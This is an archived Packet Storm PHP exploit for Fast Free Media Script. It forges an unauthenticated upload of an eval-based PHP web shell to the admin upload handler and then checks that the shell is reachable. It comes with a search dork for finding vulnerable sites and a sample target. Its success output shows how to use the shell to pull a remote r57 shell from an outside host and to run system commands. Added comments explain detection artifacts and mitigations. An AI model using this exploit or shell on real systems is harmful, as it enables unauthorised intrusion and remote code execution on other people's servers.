fastfree-rfi.txt

2008-06-09T00:00:00
ID PACKETSTORM:67082
Type packetstorm
Reporter Liz0ziM
Modified 2008-06-09T00:00:00

Description

                                        
`<?php  
// Exploit harness preamble (Packet Storm 67082). The page below is a web form
// that forges an HTTP file upload against the target's admin upload handler
// and then checks whether the uploaded file is reachable.
// NOTE(review): error_reporting() receives the string "E_ALL", not the
// constant E_ALL, so this call does not enable full reporting as intended.
error_reporting("E_ALL");  
// No PHP execution time limit; each socket operation times out after 5 seconds.
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
// Send a raw, pre-built HTTP request ($paket) to $host on TCP/80 and store
// the complete response in the global $veri, which the caller inspects for a
// success marker. Everything travels as plain-text HTTP/1.0, so both the
// upload and the follow-up GET are visible to network monitoring and appear
// in the target's web access logs.
function yolla($host,$paket)  
{  
global $veri;  
// gethostbyname() returns its input unchanged when resolution fails;
// presumably fsockopen() then fails and the branch below runs — not verified.
$ac=fsockopen(gethostbyname($host),80);  
if (!$ac) {  
echo 'Unable to connect to server '.$host.':80'; exit;// if the connection cannot be made  
}  
fputs($ac,$paket);  
  
// Read the response one byte at a time until the server closes the socket
// (the caller's requests carry "Connection: close").
$veri="";  
while (!feof($ac)) {  
$veri.=fread($ac,1);  
  
}  
fclose($ac);  
}  
  
?>  
<h2>Fast Free Media Script Remote Code Injection Exploit</h2>  
<p>Coded By Liz0ziM</p>  
<p>Web:<a href="http://www.biyosecurity.com" target="_blank">www.biyosecurity.com</a> </p>  
<p>Dork:"Powered by FastFreeMedia.com" & inurl:cat-1-p0.html & inurl:page.php?page=topvids & inurl:page.php?page=topgames </p>  
<form method="POST" action="">  
<p>TARGET HOST:  
<input name="host" type="text" />   
Example:<strong>www.sexwhispers.com</strong></p>  
<p>TARGET PATH: <input name="klasor" type="text" />  
Example:<strong>/</strong> or <strong>/scriptpath/</strong> </p>  
<p>ADMIN PATH: <select name="admin"><option value="admincp">admincp</option><option value="admin">admin</option> </select>  
</p>  
<p><input name="yolla" type="submit" value="Send" /></p>  
</form><br />  
<? if($_POST[yolla]){  
// NOTE(review): "<?" is a short open tag and $_POST[yolla] uses an unquoted,
// constant-style key; both depend on legacy PHP configuration.
  
// Form inputs are used verbatim: target host, install path, and the admin
// directory name (admincp or admin) that contains uploadfiles.php.
$host=$_POST[host];  
$klasor=$_POST[klasor];  
$admin=$_POST[admin];  
$p=$klasor.$admin."/uploadfiles.php";  
echo '<font color="red"><b>Sending Exploit..</b></font><br>';  
sleep(5);  
// Multipart body for the upload. A .php file is declared as image/jpeg; the
// success check below (GET of the stored file) shows the vulnerable handler
// keeps the original extension and stores it where the web server executes
// scripts. The uploaded file is a minimal remote-code-execution stub; the
// literal "biyosecurity" it echoes is the marker the check looks for.
// Detection artifacts visible in this request: the fixed boundary string,
// the filename "bst.php", and the query parameter name "liz0".
// Mitigation: require authentication on the upload handler, allowlist file
// types by extension and content, and serve uploads from a non-executable
// location.
$data='  
-----------------------------17459113492913  
Content-Disposition: form-data; name="biyosecurity"; filename="bst.php"  
Content-Type: image/jpeg;  
  
<?php error_reporting(0); set_time_limit(0); echo "biyosecurity"; eval(stripslashes(urldecode($_GET[liz0]))); ?>  
-----------------------------17459113492913  
  
';  
// Raw HTTP/1.0 POST to <path><admin>/uploadfiles.php. No Cookie or other
// credential header is sent, so the exploit relies on the upload handler
// being reachable unauthenticated.
$paket ="POST ".$p." HTTP/1.0\r\n";  
$paket.="Content-Type: multipart/form-data; boundary=---------------------------17459113492913\r\n";  
$paket.="Host: ".$host."\r\n";  
$paket.="Content-Length: ".strlen($data)."\r\n";  
$paket.="Connection: close\r\n\r\n";  
$paket.=$data;  
yolla($host,$paket);  
  
sleep(5);  
// Verification: fetch the stored file from the upload directory and test the
// response body for the marker echoed by the stub.
$packet ="GET /media/upload/bst.php HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
yolla($host,$packet);  
// $veri is the global response buffer filled by yolla().
// NOTE(review): eregi() was removed in PHP 7.0, so this line errors on modern PHP.
if (eregi("biyosecurity",$veri))  
{  
$mesaj='  
<font color="green">Exploit succeeded...</font>  
<br>  
<b>insert evil code :</b>http://'.$host.$klasor.'media/upload/bst.php  
<br>  
<b>Example:</b> http://'.$host.$klasor.'media/upload/bst.php?liz0=include($_GET[x]);&x=http://www.r57.li/r57.txt?  
<br>  
<b>Example2:</b> http://'.$host.$klasor.'media/upload/bst.php?liz0=passthru($_GET[x]);&x=ls  
';  
  
}  
else  
{  
$mesaj='<font color="red">Exploit Failed !</font>';  
}  
  
}  
  
// On a plain GET of the form, $mesaj is never assigned (undefined-variable notice).
echo $mesaj;   
?>`